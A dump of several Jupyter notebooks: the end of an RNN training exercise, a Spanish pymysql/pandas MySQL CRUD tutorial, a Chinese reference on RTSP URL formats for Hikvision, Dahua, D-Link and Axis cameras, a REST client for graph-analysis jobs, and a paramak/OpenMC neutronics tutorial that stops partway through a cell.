"def train():\n iter_steps = 15000\n lr = 1e-2\n seq_length = 5\n \n rnn = RNN(1, 10, 1)\n data = generate_samples(seq_length=seq_length, batch_size=1, input_size=1)\n loss = []\n\n for i, (x, y) in zip(range(iter_steps), data):\n rnn.reset()\n\n for x_t in x:\n y_hat = rnn.forward(x_t)\n\n loss.append(rnn.backward(y_hat, y))\n rnn.update(lr)\n\n # plot learnin g curve\n plt.title('sequence length %d' % seq_length)\n plt.plot(range(len(loss)), loss)\n plt.show()\n\ntrain()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
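A generic sketch of the central-difference gradient check used in the assignment above; `loss_fn` is a placeholder closure, not a name from the notebook.

```python
import numpy as np

def numeric_grad(loss_fn, w, eps=1e-5):
    """Central-difference gradient of a scalar loss with respect to array w (edited in place)."""
    g = np.zeros_like(w)
    for idx, w0 in np.ndenumerate(w):
        w[idx] = w0 + eps / 2
        hi = loss_fn()
        w[idx] = w0 - eps / 2
        lo = loss_fn()
        w[idx] = w0
        g[idx] = (hi - lo) / eps
    return g

# Example: d/dw of 0.5*||w||^2 is w itself, so the check should agree closely.
w = np.random.randn(3, 2)
assert np.allclose(numeric_grad(lambda: 0.5 * np.sum(w**2), w), w, atol=1e-6)
```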
cb2d1b1a64d8b6b145cb14e25c763e13cdedc331 | 22,026 | ipynb | Jupyter Notebook | week14/day3/theory/pymysql/manage_sql_jupyter.ipynb | Clapiniella/data_science_nov_2020 | 7f98e626328169e266b0ee980f457b8402999647 | [
"Apache-2.0"
] | null | null | null | week14/day3/theory/pymysql/manage_sql_jupyter.ipynb | Clapiniella/data_science_nov_2020 | 7f98e626328169e266b0ee980f457b8402999647 | [
"Apache-2.0"
] | null | null | null | week14/day3/theory/pymysql/manage_sql_jupyter.ipynb | Clapiniella/data_science_nov_2020 | 7f98e626328169e266b0ee980f457b8402999647 | [
"Apache-2.0"
] | null | null | null | 29.644684 | 1,324 | 0.504767 | [
[
[
"===============================\n\n### IMPORTS & GET DATABASE INFO",
"_____no_output_____"
]
],
[
[
"from jsons import read_json_to_dict\nfrom mysql_driver import MySQL\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\njson_readed = read_json_to_dict(\"sql_server_settings.json\")\nIP_DNS = json_readed[\"IP_DNS\"]\nUSER = json_readed[\"USER\"]\nPASSWORD = json_readed[\"PASSWORD\"]\nBD_NAME = json_readed[\"BD_NAME\"]\nPORT = json_readed[\"PORT\"]",
"_____no_output_____"
],
[
"# Connect to MySQL\nmysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)\nmysql_db.connect()",
"Connected to MySQL server [clancetin_db]\n"
]
],
[
[
"============== \n\n### DROP TABLE",
"_____no_output_____"
]
],
[
[
"# Drop table if it already exist using execute() method.\n#mysql_db.cursor.execute(\"DROP TABLE IF EXISTS people\")\n\nmysql_db.execute_interactive_sql(sql=\"DROP TABLE IF EXISTS people\")",
"Executed \n\nDROP TABLE IF EXISTS people\n\n successfully\n"
]
],
[
[
"============== \n\n### CREATE TABLE",
"_____no_output_____"
]
],
[
[
"# Create table as per requirement\ncreate_table_sql = \"\"\"CREATE TABLE people(\n ID INT(11) NOT NULL AUTO_INCREMENT,\n MOMENTO TIMESTAMP NOT NULL,\n NOMBRE VARCHAR(20) NOT NULL,\n APELLIDOS VARCHAR(100) NOT NULL,\n DIRECCION VARCHAR(50),\n EDAD INT,\n NOTA VARCHAR(40),\n PRIMARY KEY (ID))\"\"\"\n\nmysql_db.execute_interactive_sql(sql=create_table_sql)",
"Executed \n\nCREATE TABLE people(\n ID INT(11) NOT NULL AUTO_INCREMENT,\n MOMENTO TIMESTAMP NOT NULL,\n NOMBRE VARCHAR(20) NOT NULL,\n APELLIDOS VARCHAR(100) NOT NULL,\n DIRECCION VARCHAR(50),\n EDAD INT,\n NOTA VARCHAR(40),\n PRIMARY KEY (ID))\n\n successfully\n"
]
],
[
[
"============== \n\n### SELECT TABLE",
"_____no_output_____"
]
],
[
[
"# Select\nselect_sql = \"\"\"SELECT * FROM people\"\"\"\nselect_result = mysql_db.execute_get_sql(sql=select_sql)\n\n# tupla de tuplas\ntype(select_result)",
"Executing:\n SELECT * FROM people\n"
],
[
"select_result",
"_____no_output_____"
]
],
[
[
"============== \n\n### INSERT TABLE",
"_____no_output_____"
]
],
[
[
"# Insert\n\nto_insert_1 = [\"Pepito\", \"Wolfram_Eustaquio\", \"Calle Bellavista 9º-B\", \"67\", \"Enfermedad: Ceguera\"]\nto_insert_2 = [\"Juanita\", \"Data Science\", \"Calle Recoletos\", \"15\", \"Está muy alegre siempre\"]\n\nsql_to_insert_1 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_1)\nsql_to_insert_2 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_2)",
"_____no_output_____"
],
[
"sql_to_insert_1",
"_____no_output_____"
],
[
"# Otra forma de insert\nmysql_db.execute_interactive_sql(sql=\"\"\"INSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')\"\"\")",
"Executed \n\nINSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')\n\n successfully\n"
],
[
"mysql_db.execute_interactive_sql(sql=sql_to_insert_1)\nmysql_db.execute_interactive_sql(sql=sql_to_insert_2)",
"Executed \n\nINSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')\n\n successfully\nExecuted \n\nINSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Juanita', 'Data Science', 'Calle Recoletos', '15', 'Está muy alegre siempre')\n\n successfully\n"
]
],
[
[
"=====================\n\n### SELECT COLUMNS",
"_____no_output_____"
]
],
[
[
"select_sql = \"\"\"SELECT * FROM people\"\"\"\nselect_result = mysql_db.execute_get_sql(sql=select_sql)\nselect_result",
"Executing:\n SELECT * FROM people\n"
]
],
[
[
"### Select with pandas",
"_____no_output_____"
]
],
[
[
"import pymysql\n\nmysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)\n\n# Version 1 \ndb = mysql_db.connect()\ndf = pd.read_sql(\"select * from people\", con=db)\ndf",
"Connected to MySQL server [clancetin_db]\n"
],
[
"# Version 2\ndb_connection_str = mysql_db.SQL_ALCHEMY\n\n#string = 'mysql+pymysql://root:[email protected]:20001/datasciencetb_db'\ndb_connection = create_engine(db_connection_str)\n\ndf = pd.read_sql(\"select * from people\", con=db_connection)\npd.set_option('display.expand_frame_repr', False)\n\ndf",
"_____no_output_____"
]
],
[
[
"### Insert from pandas",
"_____no_output_____"
]
],
[
[
"table_to_insert = \"people\"\n\ndf_to_insert = df.drop(columns=[\"ID\"])\n# if_exists tiene dos posibilidades: \nto_append = \"append\"\nto_replace = \"replace\"\n\ntry:\n frame_sql = df_to_insert.to_sql(name=table_to_insert, con=db_connection, if_exists=\"append\", index=False)\n print(\"Success\")\nexcept Exception as error:\n print(error)",
"Success\n"
]
],
[
[
"=============================\n\n### Drop row",
"_____no_output_____"
]
],
[
[
"sql_drop = \"\"\"DELETE FROM people WHERE NOMBRE='Pepito';\"\"\"\n\nmysql_db.execute_interactive_sql(sql=sql_drop)",
"Executed \n\nDELETE FROM people WHERE NOMBRE='Pepito';\n\n successfully\n"
]
],
[
[
"=============================\n\n### Update row",
"_____no_output_____"
]
],
[
[
"#CRUD:\n#Create\n#Replace\n#Update\n#Delete",
"_____no_output_____"
],
[
"sql_update = \"\"\"UPDATE people set EDAD=102 WHERE NOMBRE='Juanita';\"\"\"\n\nmysql_db.execute_interactive_sql(sql=sql_update)",
"Executed \n\nUPDATE people set EDAD=102 WHERE NOMBRE='Juanita';\n\n successfully\n"
],
[
"mysql_db.close()",
"Close connection with MySQL server [clancetin_db]\n"
]
],
[
[
"### Ejemplo trabajar directamente con pandas",
"_____no_output_____"
]
],
[
[
"# Version 2\ndb_connection_str = mysql_db.SQL_ALCHEMY\n\n#string = 'mysql+pymysql://root:[email protected]:20001/datasciencetb_db'\n#db_connection = create_engine(string)\ndb_connection = create_engine(db_connection_str)\n\ndf1 = pd.read_sql(\"select * from people\", con=db_connection)\n\ndf1",
"_____no_output_____"
],
[
"df1 = df1[df1.ID <= 5]\ndf1",
"_____no_output_____"
],
[
"# Example\n\ntable_to_insert = \"people\"\n\nto_append = \"append\"\nto_replace = \"replace\"\n\ntry:\n frame_sql = df1.to_sql(name=\"people\", con=db_connection, if_exists=\"replace\", index=False)\n print(\"Success\")\nexcept Exception as error:\n print(error)",
"_____no_output_____"
]
],
[
[
"### Interactuando directamente con la base de datos sin pasar por pandas",
"_____no_output_____"
]
],
[
[
"sql2 = \"\"\"DELETE FROM people WHERE ID>5;\"\"\"\n\nmysql_db.execute_interactive_sql(sql=sql2)",
"Executed \n\nDELETE FROM people WHERE ID>5;\n\n successfully\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
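A hedged sketch of parameterized inserts with pymysql, as an alternative to hand-assembling SQL strings the way the notebook above does; the host, credentials and database name are placeholders.

```python
import pymysql

conn = pymysql.connect(host="127.0.0.1", user="root", password="secret",
                       database="example_db", port=3306)
try:
    with conn.cursor() as cur:
        sql = ("INSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) "
               "VALUES (NOW(), %s, %s, %s, %s, %s)")
        # pymysql escapes the parameters, so no manual string formatting is needed
        cur.execute(sql, ("Juanita", "Data Science", "Calle Recoletos", 15, "nota"))
    conn.commit()
finally:
    conn.close()
```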
cb2d1b73dde37aeb6325e42d780138d3b59a3dec | 5,145 | ipynb | Jupyter Notebook | 网络协议/RTSP-(5)各主流摄像头的rtsp地址格式.ipynb | wanZzz6/Modules-Learn | 7bb92327372ec369e23b2ef307302a91a9b86a5d | [
"MIT"
] | 13 | 2020-03-07T04:03:36.000Z | 2022-02-28T10:42:32.000Z | 网络协议/RTSP-(5)各主流摄像头的rtsp地址格式.ipynb | wanZzz6/Modules-Learn | 7bb92327372ec369e23b2ef307302a91a9b86a5d | [
"MIT"
] | null | null | null | 网络协议/RTSP-(5)各主流摄像头的rtsp地址格式.ipynb | wanZzz6/Modules-Learn | 7bb92327372ec369e23b2ef307302a91a9b86a5d | [
"MIT"
] | 2 | 2020-03-07T04:03:45.000Z | 2020-04-07T15:35:58.000Z | 27.810811 | 106 | 0.560155 | [
[
[
"# 各主流摄像头的rtsp地址格式\n\n\n## 海康威视\n\n### IPC 摄像头\n\n>rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream\n\n说明:\n- username: 用户名。例如admin。\n- password: 密码。例如12345。\n- ip: 为设备IP。例如 192.0.0.64。\n- port: 端口号默认为554,若为默认可不填写。\n- codec:有h264、MPEG-4、mpeg4这几种。\n- channel: 通道号,起始为1。例如通道1,则为ch1。\n- subtype: 码流类型,主码流为main,辅码流为sub。\n\n**例如**,请求海康摄像机通道1的主码流,Url如下\n主码流:\n- rtsp://admin:[email protected]:554/h264/ch1/main/av_stream\n- rtsp://admin:[email protected]:554/MPEG-4/ch1/main/av_stream\n\n子码流:\n- rtsp://admin:[email protected]/mpeg4/ch1/sub/av_stream\n- rtsp://admin:[email protected]/h264/ch1/sub/av_stream\n\n### NVR\n\n海康新版本,DS系列\n\n> rtsp://username:password@<address>:<port>/Streaming/Channels/<id>(?parm1=value1&parm2-=value2…)\n\n 举例说明:\n\nDS-9632N-ST的IP通道01主码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/101?transportmode=unicast\n\nDS-9016HF-ST的IP通道01主码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/1701?transportmode=unicast\n\nDS-9016HF-ST的模拟通道01子码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/102?transportmode=unicast (单播)\n\nrtsp://admin:[email protected]:554/Streaming/Channels/102?transportmode=multicast (多播)\n\nrtsp://admin:[email protected]:554/Streaming/Channels/102 (?后面可省略,默认单播)\n\nDS-9016HF-ST的零通道主码流(零通道无子码流):\n\nrtsp://admin:[email protected]:554/Streaming/Channels/001\n\nDS-2DF7274-A的第三码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/103\n\n更多信息:https://blog.csdn.net/xiejiashu/article/details/71786187\n \n## 大华\n\n>rtsp://[username]:[password]@[ip]:[port]/cam/realmonitor?[channel]&[subtype]\n\n说明:\n- username: 用户名。例如admin。\n- password: 密码。例如admin。\n- ip: 为设备IP。例如 10.7.8.122。\n- port: 端口号默认为554,若为默认可不填写。\n- channel: 通道号,起始为1。例如通道2,则为channel=2。\n- subtype: 码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)。\n\n**例如**,请求某设备的通道2的辅码流,Url如下\n\nrtsp://admin:[email protected]:554/cam/realmonitor?channel=2&subtype=1\n\n## D-Link\n>rtsp://[username]:[password]@[ip]:[port]/[channel].sdp\n\n说明:\n- username:用户名。例如admin\n- password:密码。例如12345,如果没有网络验证可直接写成rtsp:// [ip]:[port]/[channel].sdp\n- ip:为设备IP。例如192.168.0.108。\n- port:端口号默认为554,若为默认可不填写。\n- channel:通道号,起始为1。例如通道2,则为live2。\n\n**例如**,请求某设备的通道2的码流,URL如下\n\nrtsp://admin:[email protected]:554/live2.sdp\n\n## Axis(安讯士)\n\n>rtsp://[username]:[password]@[ip]/axis-media/media.amp?[videocodec]&[resolution]\n\n说明:\n- username:用户名。例如admin\n- password:密码。例如12345,如果没有网络验证可省略用户名密码部分以及@字符。\n- ip:为设备IP。例如192.168.0.108。\n- videocodec:支持MPEG、h.264等,可缺省。\n- resolution:分辨率,如resolution=1920x1080,若采用默认分辨率,可缺省此参数。\n\n**例如**,请求某设备h264编码的1280x720的码流,URL如下:\n\nrtsp:// 192.168.200.202/axis-media/media.amp?videocodec=h264&resolution=1280x720\n\n---\n\n内容来源:\n- https://blog.csdn.net/viola_lulu/article/details/53330727\n- https://blog.csdn.net/xiejiashu/article/details/71786187",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown"
]
] |
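A small helper sketch for building the Hikvision IPC URL pattern documented above; the credentials and IP are the documentation's example values, not a real device.

```python
def hikvision_ipc_url(user, password, ip, channel=1, subtype="main",
                      codec="h264", port=554):
    # rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream
    return (f"rtsp://{user}:{password}@{ip}:{port}/"
            f"{codec}/ch{channel}/{subtype}/av_stream")

print(hikvision_ipc_url("admin", "12345", "192.0.0.64"))
# -> rtsp://admin:12345@192.0.0.64:554/h264/ch1/main/av_stream
```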
cb2d1e83d8acee30587287915590e4a33400b82f | 10,683 | ipynb | Jupyter Notebook | sample-notebooks/task_caller.ipynb | idekerlab/ci-service-template | 5d46f030afe01a959c6afad0af35217347f4483a | [
"MIT"
] | 2 | 2015-10-02T18:41:09.000Z | 2015-10-16T20:57:01.000Z | sample-notebooks/task_caller.ipynb | afcarl/ci-service-template | 5d46f030afe01a959c6afad0af35217347f4483a | [
"MIT"
] | 15 | 2015-05-05T22:46:37.000Z | 2021-01-20T22:55:30.000Z | sample-notebooks/task_caller.ipynb | afcarl/ci-service-template | 5d46f030afe01a959c6afad0af35217347f4483a | [
"MIT"
] | 7 | 2015-04-20T20:48:36.000Z | 2015-11-13T02:35:36.000Z | 28.488 | 88 | 0.464289 | [
[
[
"## Sample Client to Use CI Service Sample\nTested on Python 2.7.9.",
"_____no_output_____"
]
],
[
[
"!ifconfig",
"eth0 Link encap:Ethernet HWaddr 02:42:ac:11:00:99 \r\n inet addr:172.17.0.153 Bcast:0.0.0.0 Mask:255.255.0.0\r\n inet6 addr: fe80::42:acff:fe11:99/64 Scope:Link\r\n UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n RX packets:1375 errors:0 dropped:2 overruns:0 frame:0\r\n TX packets:392 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:0 \r\n RX bytes:187331 (187.3 KB) TX bytes:2362686 (2.3 MB)\r\n\r\nlo Link encap:Local Loopback \r\n inet addr:127.0.0.1 Mask:255.0.0.0\r\n inet6 addr: ::1/128 Scope:Host\r\n UP LOOPBACK RUNNING MTU:65536 Metric:1\r\n RX packets:234 errors:0 dropped:0 overruns:0 frame:0\r\n TX packets:234 errors:0 dropped:0 overruns:0 carrier:0\r\n collisions:0 txqueuelen:0 \r\n RX bytes:25814 (25.8 KB) TX bytes:25814 (25.8 KB)\r\n\r\n"
],
[
"import requests\nimport json\nimport py2cytoscape.util as cy\nimport networkx as nx\n\nBASE = 'http://192.168.99.100/v1/'\nHEADERS = {'Content-Type': 'application/json'}\n\n# Generate a scale-free graph with 3000 nodes (with NetworkX)\ng = nx.scale_free_graph(3000)\n\n# Convert to Cytoscape.js JSON\ncyg = cy.from_networkx(g)",
"_____no_output_____"
],
[
"# Hello service\nurl_hello = BASE + 'hello'\n\n\nfor i in range(3):\n post_data = {\n 'name' : 'John Doe ' + str(i)\n}\n res = requests.post(url_hello, data=json.dumps(post_data), headers=HEADERS)\n print(res.content)",
"{\n \"job_id\": \"2837b0fd-84a8-478c-a342-c30c3249b15d\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/2837b0fd-84a8-478c-a342-c30c3249b15d\"\n}\n\n{\n \"job_id\": \"b26754c6-3ee9-4343-a6f4-784e5276e1c9\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/b26754c6-3ee9-4343-a6f4-784e5276e1c9\"\n}\n\n{\n \"job_id\": \"54870a02-b787-40bf-aa8a-bd0411f08e23\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/54870a02-b787-40bf-aa8a-bd0411f08e23\"\n}\n\n"
],
[
"url_algorithms = BASE + 'algorithms'\nprint(url_algorithms)\n\nurl_btw = BASE + 'algorithms/pagerank'\n\nfor i in range(12):\n res = requests.post(url_btw, data=json.dumps(cyg), headers=HEADERS)\n print(res.content)",
"http://192.168.99.100/v1/algorithms\n{\n \"job_id\": \"22d0aac0-1216-4018-a811-46c0800795cc\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/22d0aac0-1216-4018-a811-46c0800795cc\"\n}\n\n{\n \"job_id\": \"be36cfa1-2e39-4f8a-b261-ab525b8cdffb\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/be36cfa1-2e39-4f8a-b261-ab525b8cdffb\"\n}\n\n{\n \"job_id\": \"c881e0df-590b-42c8-9fff-0321aee6b5f5\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/c881e0df-590b-42c8-9fff-0321aee6b5f5\"\n}\n\n{\n \"job_id\": \"eb26fdb7-79ef-42b1-840f-bbac48770106\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/eb26fdb7-79ef-42b1-840f-bbac48770106\"\n}\n\n{\n \"job_id\": \"7aeeb9ce-542c-401b-b6f1-5974ad6cce0d\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/7aeeb9ce-542c-401b-b6f1-5974ad6cce0d\"\n}\n\n{\n \"job_id\": \"e01600e0-50fd-4e9a-8b51-d7150ae76a9c\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/e01600e0-50fd-4e9a-8b51-d7150ae76a9c\"\n}\n\n{\n \"job_id\": \"6d9ce5dd-ed4e-41bc-9005-a9fc5759af87\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/6d9ce5dd-ed4e-41bc-9005-a9fc5759af87\"\n}\n\n{\n \"job_id\": \"c6f70c80-82ba-4b73-8e32-ae60be5fc44e\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/c6f70c80-82ba-4b73-8e32-ae60be5fc44e\"\n}\n\n{\n \"job_id\": \"31558f6e-0eed-4436-84e0-bf3e8f77a9bd\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/31558f6e-0eed-4436-84e0-bf3e8f77a9bd\"\n}\n\n{\n \"job_id\": \"c65a4993-e83a-4344-9fd1-03c265448ae2\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/c65a4993-e83a-4344-9fd1-03c265448ae2\"\n}\n\n{\n \"job_id\": \"1ad63ea6-538a-4daa-a8aa-a12b367b4f2c\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/1ad63ea6-538a-4daa-a8aa-a12b367b4f2c\"\n}\n\n{\n \"job_id\": \"69695277-2b7d-4203-a54d-00a454bf5e32\", \n \"result_type\": \"memory\", \n \"status\": \"queued\", \n \"url\": \"queue/69695277-2b7d-4203-a54d-00a454bf5e32\"\n}\n\n"
],
[
"# Apply layout URL:\n\nurl_apply = BASE + 'generators/scalefree'\npost_data = {\n 'num_nodes': 1000\n}\n\nfor i in range(5):\n res = requests.post(url_apply, data=json.dumps(post_data), headers=HEADERS)\n print(res.content)",
"{\n \"job_id\": \"cace0dbb-b1ca-45d4-85a4-19535a2be8f0\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/cace0dbb-b1ca-45d4-85a4-19535a2be8f0\"\n}\n\n{\n \"job_id\": \"1bbd547a-8f49-45e4-a41b-be3415f3b471\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/1bbd547a-8f49-45e4-a41b-be3415f3b471\"\n}\n\n{\n \"job_id\": \"3012143f-c254-4eed-8f2f-cd3973631bc5\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/3012143f-c254-4eed-8f2f-cd3973631bc5\"\n}\n\n{\n \"job_id\": \"043ad136-9f74-4a82-9d66-ed1f4a511e0b\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/043ad136-9f74-4a82-9d66-ed1f4a511e0b\"\n}\n\n{\n \"job_id\": \"d4bc7b2d-10a5-48bb-85ed-6fd826c19598\", \n \"result_type\": \"file\", \n \"status\": \"queued\", \n \"url\": \"queue/d4bc7b2d-10a5-48bb-85ed-6fd826c19598\"\n}\n\n"
],
[
"# Job Status\nurl_jobs = BASE + 'jobs'\nprint(url_jobs)\n\nres = requests.get(url_jobs)\njobs = res.json()\n\nprint('Number of jobs = ' + str(len(jobs)))",
"http://192.168.99.100/v1/jobs\nNumber of jobs = 20\n"
],
[
"# Delete the first job\nres = requests.delete(url_jobs + '/' + jobs[0]['job_id'])\nprint(json.dumps(res.json(), indent=4))",
"{\n \"message\": \"Job 2837b0fd-84a8-478c-a342-c30c3249b15d removed.\"\n}\n"
],
[
"# res = requests.delete(url_jobs)\n# print(json.dumps(res.json(), indent=4))",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
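The notebook record above only submits jobs to the graph-analysis REST service and inspects the queue; it never waits for a result. A minimal polling sketch is given below. It assumes — this is not confirmed by the captured outputs — that the 'url' field returned for each job ('queue/<job_id>') can be GET-requested relative to the same BASE endpoint and that the JSON it returns carries a 'status' field that eventually leaves the 'queued' state; the helper name and the terminal-status check are illustrative only.

import time
import requests

BASE = 'http://192.168.99.100/v1/'

def wait_for_job(job, timeout=60, interval=2):
    # Poll the job's status URL (the 'url' field returned by the service above)
    # until the status is no longer 'queued'/'running', or until the timeout expires.
    deadline = time.time() + timeout
    while time.time() < deadline:
        res = requests.get(BASE + job['url'])
        res.raise_for_status()
        body = res.json()
        if body.get('status') not in ('queued', 'running'):
            return body
        time.sleep(interval)
    raise TimeoutError('Job ' + job['job_id'] + ' did not finish within ' + str(timeout) + 's')

# Hypothetical usage: job = requests.post(url_hello, data=json.dumps(post_data), headers=HEADERS).json()
# result = wait_for_job(job)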
cb2d2b898f5229f2f1de9c2f947738fd15b2b6d9 | 7,523 | ipynb | Jupyter Notebook | tasks/task_12_CAD_mesh_fast_flux/1_making_shapes_into_a_neutronics_model.ipynb | pshriwise/openmc_workshop | 7bf1fe7483305c63c9442a9e80266b56675489fb | [
"MIT"
] | null | null | null | tasks/task_12_CAD_mesh_fast_flux/1_making_shapes_into_a_neutronics_model.ipynb | pshriwise/openmc_workshop | 7bf1fe7483305c63c9442a9e80266b56675489fb | [
"MIT"
] | null | null | null | tasks/task_12_CAD_mesh_fast_flux/1_making_shapes_into_a_neutronics_model.ipynb | pshriwise/openmc_workshop | 7bf1fe7483305c63c9442a9e80266b56675489fb | [
"MIT"
] | null | null | null | 26.583039 | 171 | 0.554167 | [
[
[
"# Heating Mesh Tally on CAD geometry made from Shapes\n\nThis constructs a reactor geometry from 3 Shape objects each made from points.\n\nThe Shapes made include a breeder blanket, PF coil and a central column shield.\n\n2D and 3D Meshes tally are then simulated to show nuclear heating, flux and tritium_production across the model.",
"_____no_output_____"
],
[
"This makes a 3D geometry and material for PF coil",
"_____no_output_____"
]
],
[
[
"import paramak\n\npf_coil = paramak.RotateStraightShape(\n points=[\n (700, 0),\n (750, 0),\n (750, 50),\n (700, 50)\n ],\n stp_filename = 'pf_coil.stp',\n material_tag = 'pf_coil_material'\n)\n\npf_coil.solid",
"_____no_output_____"
]
],
[
[
"This makes a 3D geometry and material for the centre column",
"_____no_output_____"
]
],
[
[
"center_column = paramak.RotateMixedShape(\n points=[\n (50, 600, 'straight'),\n (150, 600, 'spline'),\n (100, 0, 'spline'),\n (150, -600, 'straight'),\n (50, -600, 'straight')\n ],\n stp_filename = 'center_column.stp',\n material_tag = 'center_column_material'\n)\n\ncenter_column.solid",
"_____no_output_____"
]
],
[
[
"This makes a 3D geometry and material for breeder blanket. The azimuth_placement_angle argument is used to repeat the geometry around the Z axis at specified angles.",
"_____no_output_____"
]
],
[
[
"blanket = paramak.RotateSplineShape(\n points=[\n (600, 0),\n (600, -20),\n (500, -300),\n (400, -300),\n (400, 0),\n (400, 300),\n (500, 300),\n (600, 20)\n ],\n rotation_angle=40,\n azimuth_placement_angle=[0, 45, 90, 135, 180, 225, 270, 315],\n stp_filename = 'blanket.stp',\n material_tag = 'blanket_material'\n)\n\nblanket.solid",
"_____no_output_____"
]
],
[
[
"This makes a reactor object from the three components",
"_____no_output_____"
]
],
[
[
"my_reactor = paramak.Reactor([blanket, pf_coil,center_column])\n\nmy_reactor.solid",
"_____no_output_____"
]
],
[
[
"At this stage we can export the reactor geometry as stp files and make them avaialbe from download and viewing in FreeCAD.",
"_____no_output_____"
]
],
[
[
"my_reactor.export_stp()\n\nfrom IPython.display import FileLink\ndisplay(FileLink('blanket.stp'))\ndisplay(FileLink('pf_coil.stp'))\ndisplay(FileLink('center_column.stp'))\ndisplay(FileLink('Graveyard.stp'))",
"_____no_output_____"
]
],
[
[
"The next section defines the materials. This can be done using openmc.Materials or in this case strings that look up materials from the neutronics material maker.",
"_____no_output_____"
]
],
[
[
"from neutronics_material_maker import Material\n\nmat1 = Material(material_name='Li4SiO4',\n material_tag='blanket_material')\n\nmat2 = Material(material_name='copper',\n material_tag='pf_coil_material')\n\nmat3 = Material(material_name='WC',\n material_tag='center_column_material')",
"_____no_output_____"
]
],
[
[
"This next step makes a simple point source",
"_____no_output_____"
]
],
[
[
"import openmc\n\n# initialises a new source object\nsource = openmc.Source()\n\n# sets the location of the source to x=0 y=0 z=0\nsource.space = openmc.stats.Point((100, 0, 0))\n\n# sets the direction to isotropic\nsource.angle = openmc.stats.Isotropic()\n\n# sets the energy distribution to 100% 14MeV neutrons\nsource.energy = openmc.stats.Discrete([14e6], [1])",
"_____no_output_____"
]
],
[
[
"This next section combines the geometry with the materials and specifies a few mesh tallies",
"_____no_output_____"
]
],
[
[
"neutronics_model = paramak.NeutronicsModel(\n geometry=my_reactor,\n mesh_tally_2d=['heating', 'flux', '(n,Xt)'],\n mesh_tally_3d=['heating', 'flux', '(n,Xt)'],\n source=source,\n simulation_batches=10,\n simulation_particles_per_batch=1000,\n materials={\n 'blanket_material': mat1,\n 'pf_coil_material': mat2,\n 'center_column_material': mat3,\n }\n)\n\nneutronics_model.simulate()",
"_____no_output_____"
]
],
[
[
"The next section produces download links for:\n\n- vtk files that contain the 3D mesh results (open with Paraview)\n- png images that show the resuls of the 2D mesh tally",
"_____no_output_____"
]
],
[
[
